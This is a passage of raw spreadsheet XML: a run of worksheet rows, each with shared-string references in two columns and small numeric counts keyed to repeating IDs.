        <v>16231</v>
      </c>
      <c r="B14300" t="s">
        <v>16218</v>
      </c>
      <c r="C14300">
        <v>3</v>
      </c>
      <c r="D14300">
        <v>1402</v>
      </c>
    </row>
    <row r="14301" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14301" t="s">
        <v>16229</v>
      </c>
      <c r="B14301" t="s">
        <v>16219</v>
      </c>
      <c r="C14301">
        <v>0</v>
      </c>
      <c r="D14301">
        <v>1402</v>
      </c>
    </row>
    <row r="14302" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14302" t="s">
        <v>16230</v>
      </c>
      <c r="B14302" t="s">
        <v>16220</v>
      </c>
      <c r="C14302">
        <v>0</v>
      </c>
      <c r="D14302">
        <v>1402</v>
      </c>
    </row>
    <row r="14303" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14303" t="s">
        <v>16229</v>
      </c>
      <c r="B14303" t="s">
        <v>16221</v>
      </c>
      <c r="C14303">
        <v>0</v>
      </c>
      <c r="D14303">
        <v>1402</v>
      </c>
    </row>
    <row r="14304" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14304" t="s">
        <v>16230</v>
      </c>
      <c r="B14304" t="s">
        <v>16222</v>
      </c>
      <c r="C14304">
        <v>0</v>
      </c>
      <c r="D14304">
        <v>1402</v>
      </c>
    </row>
    <row r="14305" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14305" t="s">
        <v>16223</v>
      </c>
      <c r="B14305" t="s">
        <v>16223</v>
      </c>
      <c r="C14305">
        <v>25</v>
      </c>
      <c r="D14305">
        <v>1402</v>
      </c>
    </row>
    <row r="14306" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14306" t="s">
        <v>16224</v>
      </c>
      <c r="B14306" t="s">
        <v>16224</v>
      </c>
      <c r="C14306">
        <v>1</v>
      </c>
      <c r="D14306">
        <v>1402</v>
      </c>
    </row>
    <row r="14307" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14307" t="s">
        <v>16228</v>
      </c>
      <c r="B14307" t="s">
        <v>16211</v>
      </c>
      <c r="C14307">
        <v>0</v>
      </c>
      <c r="D14307">
        <v>5119</v>
      </c>
    </row>
    <row r="14308" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14308" t="s">
        <v>16231</v>
      </c>
      <c r="B14308" t="s">
        <v>16212</v>
      </c>
      <c r="C14308">
        <v>0</v>
      </c>
      <c r="D14308">
        <v>5119</v>
      </c>
    </row>
    <row r="14309" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14309" t="s">
        <v>16228</v>
      </c>
      <c r="B14309" t="s">
        <v>16213</v>
      </c>
      <c r="C14309">
        <v>0</v>
      </c>
      <c r="D14309">
        <v>5119</v>
      </c>
    </row>
    <row r="14310" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14310" t="s">
        <v>16231</v>
      </c>
      <c r="B14310" t="s">
        <v>16214</v>
      </c>
      <c r="C14310">
        <v>0</v>
      </c>
      <c r="D14310">
        <v>5119</v>
      </c>
    </row>
    <row r="14311" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14311" t="s">
        <v>16228</v>
      </c>
      <c r="B14311" t="s">
        <v>16215</v>
      </c>
      <c r="C14311">
        <v>2</v>
      </c>
      <c r="D14311">
        <v>5119</v>
      </c>
    </row>
    <row r="14312" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14312" t="s">
        <v>16231</v>
      </c>
      <c r="B14312" t="s">
        <v>16216</v>
      </c>
      <c r="C14312">
        <v>1</v>
      </c>
      <c r="D14312">
        <v>5119</v>
      </c>
    </row>
    <row r="14313" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14313" t="s">
        <v>16228</v>
      </c>
      <c r="B14313" t="s">
        <v>16217</v>
      </c>
      <c r="C14313">
        <v>3</v>
      </c>
      <c r="D14313">
        <v>5119</v>
      </c>
    </row>
    <row r="14314" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14314" t="s">
        <v>16231</v>
      </c>
      <c r="B14314" t="s">
        <v>16218</v>
      </c>
      <c r="C14314">
        <v>0</v>
      </c>
      <c r="D14314">
        <v>5119</v>
      </c>
    </row>
    <row r="14315" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14315" t="s">
        <v>16229</v>
      </c>
      <c r="B14315" t="s">
        <v>16219</v>
      </c>
      <c r="C14315">
        <v>0</v>
      </c>
      <c r="D14315">
        <v>5119</v>
      </c>
    </row>
    <row r="14316" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14316" t="s">
        <v>16230</v>
      </c>
      <c r="B14316" t="s">
        <v>16220</v>
      </c>
      <c r="C14316">
        <v>0</v>
      </c>
      <c r="D14316">
        <v>5119</v>
      </c>
    </row>
    <row r="14317" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14317" t="s">
        <v>16229</v>
      </c>
      <c r="B14317" t="s">
        <v>16221</v>
      </c>
      <c r="C14317">
        <v>8</v>
      </c>
      <c r="D14317">
        <v>5119</v>
      </c>
    </row>
    <row r="14318" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14318" t="s">
        <v>16230</v>
      </c>
      <c r="B14318" t="s">
        <v>16222</v>
      </c>
      <c r="C14318">
        <v>3</v>
      </c>
      <c r="D14318">
        <v>5119</v>
      </c>
    </row>
    <row r="14319" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14319" t="s">
        <v>16223</v>
      </c>
      <c r="B14319" t="s">
        <v>16223</v>
      </c>
      <c r="C14319">
        <v>6</v>
      </c>
      <c r="D14319">
        <v>5119</v>
      </c>
    </row>
    <row r="14320" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14320" t="s">
        <v>16224</v>
      </c>
      <c r="B14320" t="s">
        <v>16224</v>
      </c>
      <c r="C14320">
        <v>1</v>
      </c>
      <c r="D14320">
        <v>5119</v>
      </c>
    </row>
    <row r="14321" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14321" t="s">
        <v>16228</v>
      </c>
      <c r="B14321" t="s">
        <v>16211</v>
      </c>
      <c r="C14321">
        <v>0</v>
      </c>
      <c r="D14321">
        <v>4964</v>
      </c>
    </row>
    <row r="14322" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14322" t="s">
        <v>16231</v>
      </c>
      <c r="B14322" t="s">
        <v>16212</v>
      </c>
      <c r="C14322">
        <v>0</v>
      </c>
      <c r="D14322">
        <v>4964</v>
      </c>
    </row>
    <row r="14323" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14323" t="s">
        <v>16228</v>
      </c>
      <c r="B14323" t="s">
        <v>16213</v>
      </c>
      <c r="C14323">
        <v>0</v>
      </c>
      <c r="D14323">
        <v>4964</v>
      </c>
    </row>
    <row r="14324" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14324" t="s">
        <v>16231</v>
      </c>
      <c r="B14324" t="s">
        <v>16214</v>
      </c>
      <c r="C14324">
        <v>0</v>
      </c>
      <c r="D14324">
        <v>4964</v>
      </c>
    </row>
    <row r="14325" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14325" t="s">
        <v>16228</v>
      </c>
      <c r="B14325" t="s">
        <v>16215</v>
      </c>
      <c r="C14325">
        <v>2</v>
      </c>
      <c r="D14325">
        <v>4964</v>
      </c>
    </row>
    <row r="14326" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14326" t="s">
        <v>16231</v>
      </c>
      <c r="B14326" t="s">
        <v>16216</v>
      </c>
      <c r="C14326">
        <v>4</v>
      </c>
      <c r="D14326">
        <v>4964</v>
      </c>
    </row>
    <row r="14327" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14327" t="s">
        <v>16228</v>
      </c>
      <c r="B14327" t="s">
        <v>16217</v>
      </c>
      <c r="C14327">
        <v>19</v>
      </c>
      <c r="D14327">
        <v>4964</v>
      </c>
    </row>
    <row r="14328" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14328" t="s">
        <v>16231</v>
      </c>
      <c r="B14328" t="s">
        <v>16218</v>
      </c>
      <c r="C14328">
        <v>13</v>
      </c>
      <c r="D14328">
        <v>4964</v>
      </c>
    </row>
    <row r="14329" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14329" t="s">
        <v>16229</v>
      </c>
      <c r="B14329" t="s">
        <v>16219</v>
      </c>
      <c r="C14329">
        <v>0</v>
      </c>
      <c r="D14329">
        <v>4964</v>
      </c>
    </row>
    <row r="14330" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14330" t="s">
        <v>16230</v>
      </c>
      <c r="B14330" t="s">
        <v>16220</v>
      </c>
      <c r="C14330">
        <v>0</v>
      </c>
      <c r="D14330">
        <v>4964</v>
      </c>
    </row>
    <row r="14331" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14331" t="s">
        <v>16229</v>
      </c>
      <c r="B14331" t="s">
        <v>16221</v>
      </c>
      <c r="C14331">
        <v>3</v>
      </c>
      <c r="D14331">
        <v>4964</v>
      </c>
    </row>
    <row r="14332" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14332" t="s">
        <v>16230</v>
      </c>
      <c r="B14332" t="s">
        <v>16222</v>
      </c>
      <c r="C14332">
        <v>34</v>
      </c>
      <c r="D14332">
        <v>4964</v>
      </c>
    </row>
    <row r="14333" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14333" t="s">
        <v>16223</v>
      </c>
      <c r="B14333" t="s">
        <v>16223</v>
      </c>
      <c r="C14333">
        <v>5</v>
      </c>
      <c r="D14333">
        <v>4964</v>
      </c>
    </row>
    <row r="14334" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14334" t="s">
        <v>16224</v>
      </c>
      <c r="B14334" t="s">
        <v>16224</v>
      </c>
      <c r="C14334">
        <v>0</v>
      </c>
      <c r="D14334">
        <v>4964</v>
      </c>
    </row>
    <row r="14335" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14335" t="s">
        <v>16228</v>
      </c>
      <c r="B14335" t="s">
        <v>16211</v>
      </c>
      <c r="C14335">
        <v>0</v>
      </c>
      <c r="D14335">
        <v>466</v>
      </c>
    </row>
    <row r="14336" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14336" t="s">
        <v>16231</v>
      </c>
      <c r="B14336" t="s">
        <v>16212</v>
      </c>
      <c r="C14336">
        <v>0</v>
      </c>
      <c r="D14336">
        <v>466</v>
      </c>
    </row>
    <row r="14337" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14337" t="s">
        <v>16228</v>
      </c>
      <c r="B14337" t="s">
        <v>16213</v>
      </c>
      <c r="C14337">
        <v>0</v>
      </c>
      <c r="D14337">
        <v>466</v>
      </c>
    </row>
    <row r="14338" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14338" t="s">
        <v>16231</v>
      </c>
      <c r="B14338" t="s">
        <v>16214</v>
      </c>
      <c r="C14338">
        <v>0</v>
      </c>
      <c r="D14338">
        <v>466</v>
      </c>
    </row>
    <row r="14339" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14339" t="s">
        <v>16228</v>
      </c>
      <c r="B14339" t="s">
        <v>16215</v>
      </c>
      <c r="C14339">
        <v>0</v>
      </c>
      <c r="D14339">
        <v>466</v>
      </c>
    </row>
    <row r="14340" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14340" t="s">
        <v>16231</v>
      </c>
      <c r="B14340" t="s">
        <v>16216</v>
      </c>
      <c r="C14340">
        <v>0</v>
      </c>
      <c r="D14340">
        <v>466</v>
      </c>
    </row>
    <row r="14341" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14341" t="s">
        <v>16228</v>
      </c>
      <c r="B14341" t="s">
        <v>16217</v>
      </c>
      <c r="C14341">
        <v>0</v>
      </c>
      <c r="D14341">
        <v>466</v>
      </c>
    </row>
    <row r="14342" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14342" t="s">
        <v>16231</v>
      </c>
      <c r="B14342" t="s">
        <v>16218</v>
      </c>
      <c r="C14342">
        <v>0</v>
      </c>
      <c r="D14342">
        <v>466</v>
      </c>
    </row>
    <row r="14343" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14343" t="s">
        <v>16229</v>
      </c>
      <c r="B14343" t="s">
        <v>16219</v>
      </c>
      <c r="C14343">
        <v>0</v>
      </c>
      <c r="D14343">
        <v>466</v>
      </c>
    </row>
    <row r="14344" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14344" t="s">
        <v>16230</v>
      </c>
      <c r="B14344" t="s">
        <v>16220</v>
      </c>
      <c r="C14344">
        <v>1</v>
      </c>
      <c r="D14344">
        <v>466</v>
      </c>
    </row>
    <row r="14345" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14345" t="s">
        <v>16229</v>
      </c>
      <c r="B14345" t="s">
        <v>16221</v>
      </c>
      <c r="C14345">
        <v>1</v>
      </c>
      <c r="D14345">
        <v>466</v>
      </c>
    </row>
    <row r="14346" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14346" t="s">
        <v>16230</v>
      </c>
      <c r="B14346" t="s">
        <v>16222</v>
      </c>
      <c r="C14346">
        <v>4</v>
      </c>
      <c r="D14346">
        <v>466</v>
      </c>
    </row>
    <row r="14347" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14347" t="s">
        <v>16223</v>
      </c>
      <c r="B14347" t="s">
        <v>16223</v>
      </c>
      <c r="C14347">
        <v>6</v>
      </c>
      <c r="D14347">
        <v>466</v>
      </c>
    </row>
    <row r="14348" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14348" t="s">
        <v>16224</v>
      </c>
      <c r="B14348" t="s">
        <v>16224</v>
      </c>
      <c r="C14348">
        <v>1</v>
      </c>
      <c r="D14348">
        <v>466</v>
      </c>
    </row>
    <row r="14349" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14349" t="s">
        <v>16228</v>
      </c>
      <c r="B14349" t="s">
        <v>16211</v>
      </c>
      <c r="C14349">
        <v>0</v>
      </c>
      <c r="D14349">
        <v>1447</v>
      </c>
    </row>
    <row r="14350" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14350" t="s">
        <v>16231</v>
      </c>
      <c r="B14350" t="s">
        <v>16212</v>
      </c>
      <c r="C14350">
        <v>0</v>
      </c>
      <c r="D14350">
        <v>1447</v>
      </c>
    </row>
    <row r="14351" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14351" t="s">
        <v>16228</v>
      </c>
      <c r="B14351" t="s">
        <v>16213</v>
      </c>
      <c r="C14351">
        <v>0</v>
      </c>
      <c r="D14351">
        <v>1447</v>
      </c>
    </row>
    <row r="14352" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14352" t="s">
        <v>16231</v>
      </c>
      <c r="B14352" t="s">
        <v>16214</v>
      </c>
      <c r="C14352">
        <v>0</v>
      </c>
      <c r="D14352">
        <v>1447</v>
      </c>
    </row>
    <row r="14353" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14353" t="s">
        <v>16228</v>
      </c>
      <c r="B14353" t="s">
        <v>16215</v>
      </c>
      <c r="C14353">
        <v>0</v>
      </c>
      <c r="D14353">
        <v>1447</v>
      </c>
    </row>
    <row r="14354" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14354" t="s">
        <v>16231</v>
      </c>
      <c r="B14354" t="s">
        <v>16216</v>
      </c>
      <c r="C14354">
        <v>3</v>
      </c>
      <c r="D14354">
        <v>1447</v>
      </c>
    </row>
    <row r="14355" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14355" t="s">
        <v>16228</v>
      </c>
      <c r="B14355" t="s">
        <v>16217</v>
      </c>
      <c r="C14355">
        <v>2</v>
      </c>
      <c r="D14355">
        <v>1447</v>
      </c>
    </row>
    <row r="14356" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14356" t="s">
        <v>16231</v>
      </c>
      <c r="B14356" t="s">
        <v>16218</v>
      </c>
      <c r="C14356">
        <v>3</v>
      </c>
      <c r="D14356">
        <v>1447</v>
      </c>
    </row>
    <row r="14357" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14357" t="s">
        <v>16229</v>
      </c>
      <c r="B14357" t="s">
        <v>16219</v>
      </c>
      <c r="C14357">
        <v>0</v>
      </c>
      <c r="D14357">
        <v>1447</v>
      </c>
    </row>
    <row r="14358" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14358" t="s">
        <v>16230</v>
      </c>
      <c r="B14358" t="s">
        <v>16220</v>
      </c>
      <c r="C14358">
        <v>0</v>
      </c>
      <c r="D14358">
        <v>1447</v>
      </c>
    </row>
    <row r="14359" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14359" t="s">
        <v>16229</v>
      </c>
      <c r="B14359" t="s">
        <v>16221</v>
      </c>
      <c r="C14359">
        <v>5</v>
      </c>
      <c r="D14359">
        <v>1447</v>
      </c>
    </row>
    <row r="14360" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14360" t="s">
        <v>16230</v>
      </c>
      <c r="B14360" t="s">
        <v>16222</v>
      </c>
      <c r="C14360">
        <v>30</v>
      </c>
      <c r="D14360">
        <v>1447</v>
      </c>
    </row>
    <row r="14361" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14361" t="s">
        <v>16223</v>
      </c>
      <c r="B14361" t="s">
        <v>16223</v>
      </c>
      <c r="C14361">
        <v>25</v>
      </c>
      <c r="D14361">
        <v>1447</v>
      </c>
    </row>
    <row r="14362" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14362" t="s">
        <v>16224</v>
      </c>
      <c r="B14362" t="s">
        <v>16224</v>
      </c>
      <c r="C14362">
        <v>1</v>
      </c>
      <c r="D14362">
        <v>1447</v>
      </c>
    </row>
    <row r="14363" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14363" t="s">
        <v>16228</v>
      </c>
      <c r="B14363" t="s">
        <v>16211</v>
      </c>
      <c r="C14363">
        <v>0</v>
      </c>
      <c r="D14363">
        <v>1078</v>
      </c>
    </row>
    <row r="14364" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14364" t="s">
        <v>16231</v>
      </c>
      <c r="B14364" t="s">
        <v>16212</v>
      </c>
      <c r="C14364">
        <v>0</v>
      </c>
      <c r="D14364">
        <v>1078</v>
      </c>
    </row>
    <row r="14365" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14365" t="s">
        <v>16228</v>
      </c>
      <c r="B14365" t="s">
        <v>16213</v>
      </c>
      <c r="C14365">
        <v>0</v>
      </c>
      <c r="D14365">
        <v>1078</v>
      </c>
    </row>
    <row r="14366" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14366" t="s">
        <v>16231</v>
      </c>
      <c r="B14366" t="s">
        <v>16214</v>
      </c>
      <c r="C14366">
        <v>0</v>
      </c>
      <c r="D14366">
        <v>1078</v>
      </c>
    </row>
    <row r="14367" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14367" t="s">
        <v>16228</v>
      </c>
      <c r="B14367" t="s">
        <v>16215</v>
      </c>
      <c r="C14367">
        <v>1</v>
      </c>
      <c r="D14367">
        <v>1078</v>
      </c>
    </row>
    <row r="14368" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14368" t="s">
        <v>16231</v>
      </c>
      <c r="B14368" t="s">
        <v>16216</v>
      </c>
      <c r="C14368">
        <v>1</v>
      </c>
      <c r="D14368">
        <v>1078</v>
      </c>
    </row>
    <row r="14369" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14369" t="s">
        <v>16228</v>
      </c>
      <c r="B14369" t="s">
        <v>16217</v>
      </c>
      <c r="C14369">
        <v>0</v>
      </c>
      <c r="D14369">
        <v>1078</v>
      </c>
    </row>
    <row r="14370" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14370" t="s">
        <v>16231</v>
      </c>
      <c r="B14370" t="s">
        <v>16218</v>
      </c>
      <c r="C14370">
        <v>5</v>
      </c>
      <c r="D14370">
        <v>1078</v>
      </c>
    </row>
    <row r="14371" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14371" t="s">
        <v>16229</v>
      </c>
      <c r="B14371" t="s">
        <v>16219</v>
      </c>
      <c r="C14371">
        <v>0</v>
      </c>
      <c r="D14371">
        <v>1078</v>
      </c>
    </row>
    <row r="14372" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14372" t="s">
        <v>16230</v>
      </c>
      <c r="B14372" t="s">
        <v>16220</v>
      </c>
      <c r="C14372">
        <v>0</v>
      </c>
      <c r="D14372">
        <v>1078</v>
      </c>
    </row>
    <row r="14373" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14373" t="s">
        <v>16229</v>
      </c>
      <c r="B14373" t="s">
        <v>16221</v>
      </c>
      <c r="C14373">
        <v>0</v>
      </c>
      <c r="D14373">
        <v>1078</v>
      </c>
    </row>
    <row r="14374" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14374" t="s">
        <v>16230</v>
      </c>
      <c r="B14374" t="s">
        <v>16222</v>
      </c>
      <c r="C14374">
        <v>2</v>
      </c>
      <c r="D14374">
        <v>1078</v>
      </c>
    </row>
    <row r="14375" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14375" t="s">
        <v>16223</v>
      </c>
      <c r="B14375" t="s">
        <v>16223</v>
      </c>
      <c r="C14375">
        <v>25</v>
      </c>
      <c r="D14375">
        <v>1078</v>
      </c>
    </row>
    <row r="14376" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14376" t="s">
        <v>16224</v>
      </c>
      <c r="B14376" t="s">
        <v>16224</v>
      </c>
      <c r="C14376">
        <v>2</v>
      </c>
      <c r="D14376">
        <v>1078</v>
      </c>
    </row>
    <row r="14377" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14377" t="s">
        <v>16228</v>
      </c>
      <c r="B14377" t="s">
        <v>16217</v>
      </c>
      <c r="C14377">
        <v>4</v>
      </c>
      <c r="D14377">
        <v>2821</v>
      </c>
    </row>
    <row r="14378" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14378" t="s">
        <v>16228</v>
      </c>
      <c r="B14378" t="s">
        <v>16211</v>
      </c>
      <c r="C14378">
        <v>2</v>
      </c>
      <c r="D14378">
        <v>5179</v>
      </c>
    </row>
    <row r="14379" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14379" t="s">
        <v>16231</v>
      </c>
      <c r="B14379" t="s">
        <v>16212</v>
      </c>
      <c r="C14379">
        <v>2</v>
      </c>
      <c r="D14379">
        <v>5179</v>
      </c>
    </row>
    <row r="14380" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14380" t="s">
        <v>16228</v>
      </c>
      <c r="B14380" t="s">
        <v>16213</v>
      </c>
      <c r="C14380">
        <v>15</v>
      </c>
      <c r="D14380">
        <v>5179</v>
      </c>
    </row>
    <row r="14381" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14381" t="s">
        <v>16231</v>
      </c>
      <c r="B14381" t="s">
        <v>16214</v>
      </c>
      <c r="C14381">
        <v>14</v>
      </c>
      <c r="D14381">
        <v>5179</v>
      </c>
    </row>
    <row r="14382" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14382" t="s">
        <v>16228</v>
      </c>
      <c r="B14382" t="s">
        <v>16215</v>
      </c>
      <c r="C14382">
        <v>5</v>
      </c>
      <c r="D14382">
        <v>5179</v>
      </c>
    </row>
    <row r="14383" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14383" t="s">
        <v>16231</v>
      </c>
      <c r="B14383" t="s">
        <v>16216</v>
      </c>
      <c r="C14383">
        <v>5</v>
      </c>
      <c r="D14383">
        <v>5179</v>
      </c>
    </row>
    <row r="14384" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14384" t="s">
        <v>16228</v>
      </c>
      <c r="B14384" t="s">
        <v>16217</v>
      </c>
      <c r="C14384">
        <v>7</v>
      </c>
      <c r="D14384">
        <v>5179</v>
      </c>
    </row>
    <row r="14385" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14385" t="s">
        <v>16231</v>
      </c>
      <c r="B14385" t="s">
        <v>16218</v>
      </c>
      <c r="C14385">
        <v>8</v>
      </c>
      <c r="D14385">
        <v>5179</v>
      </c>
    </row>
    <row r="14386" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14386" t="s">
        <v>16229</v>
      </c>
      <c r="B14386" t="s">
        <v>16219</v>
      </c>
      <c r="C14386">
        <v>2</v>
      </c>
      <c r="D14386">
        <v>5179</v>
      </c>
    </row>
    <row r="14387" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14387" t="s">
        <v>16230</v>
      </c>
      <c r="B14387" t="s">
        <v>16220</v>
      </c>
      <c r="C14387">
        <v>1</v>
      </c>
      <c r="D14387">
        <v>5179</v>
      </c>
    </row>
    <row r="14388" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14388" t="s">
        <v>16229</v>
      </c>
      <c r="B14388" t="s">
        <v>16221</v>
      </c>
      <c r="C14388">
        <v>1</v>
      </c>
      <c r="D14388">
        <v>5179</v>
      </c>
    </row>
    <row r="14389" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14389" t="s">
        <v>16230</v>
      </c>
      <c r="B14389" t="s">
        <v>16222</v>
      </c>
      <c r="C14389">
        <v>1</v>
      </c>
      <c r="D14389">
        <v>5179</v>
      </c>
    </row>
    <row r="14390" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14390" t="s">
        <v>16223</v>
      </c>
      <c r="B14390" t="s">
        <v>16223</v>
      </c>
      <c r="C14390">
        <v>25</v>
      </c>
      <c r="D14390">
        <v>5179</v>
      </c>
    </row>
    <row r="14391" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14391" t="s">
        <v>16224</v>
      </c>
      <c r="B14391" t="s">
        <v>16224</v>
      </c>
      <c r="C14391">
        <v>1</v>
      </c>
      <c r="D14391">
        <v>5179</v>
      </c>
    </row>
    <row r="14392" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14392" t="s">
        <v>16228</v>
      </c>
      <c r="B14392" t="s">
        <v>16211</v>
      </c>
      <c r="C14392">
        <v>0</v>
      </c>
      <c r="D14392">
        <v>5172</v>
      </c>
    </row>
    <row r="14393" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14393" t="s">
        <v>16231</v>
      </c>
      <c r="B14393" t="s">
        <v>16212</v>
      </c>
      <c r="C14393">
        <v>0</v>
      </c>
      <c r="D14393">
        <v>5172</v>
      </c>
    </row>
    <row r="14394" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14394" t="s">
        <v>16228</v>
      </c>
      <c r="B14394" t="s">
        <v>16213</v>
      </c>
      <c r="C14394">
        <v>0</v>
      </c>
      <c r="D14394">
        <v>5172</v>
      </c>
    </row>
    <row r="14395" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14395" t="s">
        <v>16231</v>
      </c>
      <c r="B14395" t="s">
        <v>16214</v>
      </c>
      <c r="C14395">
        <v>0</v>
      </c>
      <c r="D14395">
        <v>5172</v>
      </c>
    </row>
    <row r="14396" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14396" t="s">
        <v>16228</v>
      </c>
      <c r="B14396" t="s">
        <v>16215</v>
      </c>
      <c r="C14396">
        <v>0</v>
      </c>
      <c r="D14396">
        <v>5172</v>
      </c>
    </row>
    <row r="14397" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14397" t="s">
        <v>16231</v>
      </c>
      <c r="B14397" t="s">
        <v>16216</v>
      </c>
      <c r="C14397">
        <v>1</v>
      </c>
      <c r="D14397">
        <v>5172</v>
      </c>
    </row>
    <row r="14398" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14398" t="s">
        <v>16228</v>
      </c>
      <c r="B14398" t="s">
        <v>16217</v>
      </c>
      <c r="C14398">
        <v>1</v>
      </c>
      <c r="D14398">
        <v>5172</v>
      </c>
    </row>
    <row r="14399" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14399" t="s">
        <v>16231</v>
      </c>
      <c r="B14399" t="s">
        <v>16218</v>
      </c>
      <c r="C14399">
        <v>3</v>
      </c>
      <c r="D14399">
        <v>5172</v>
      </c>
    </row>
    <row r="14400" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14400" t="s">
        <v>16229</v>
      </c>
      <c r="B14400" t="s">
        <v>16219</v>
      </c>
      <c r="C14400">
        <v>0</v>
      </c>
      <c r="D14400">
        <v>5172</v>
      </c>
    </row>
    <row r="14401" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14401" t="s">
        <v>16230</v>
      </c>
      <c r="B14401" t="s">
        <v>16220</v>
      </c>
      <c r="C14401">
        <v>2</v>
      </c>
      <c r="D14401">
        <v>5172</v>
      </c>
    </row>
    <row r="14402" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14402" t="s">
        <v>16229</v>
      </c>
      <c r="B14402" t="s">
        <v>16221</v>
      </c>
      <c r="C14402">
        <v>1</v>
      </c>
      <c r="D14402">
        <v>5172</v>
      </c>
    </row>
    <row r="14403" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14403" t="s">
        <v>16230</v>
      </c>
      <c r="B14403" t="s">
        <v>16222</v>
      </c>
      <c r="C14403">
        <v>2</v>
      </c>
      <c r="D14403">
        <v>5172</v>
      </c>
    </row>
    <row r="14404" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14404" t="s">
        <v>16223</v>
      </c>
      <c r="B14404" t="s">
        <v>16223</v>
      </c>
      <c r="C14404">
        <v>7</v>
      </c>
      <c r="D14404">
        <v>5172</v>
      </c>
    </row>
    <row r="14405" spans="1:4" x14ac:dyDescent="0.2">
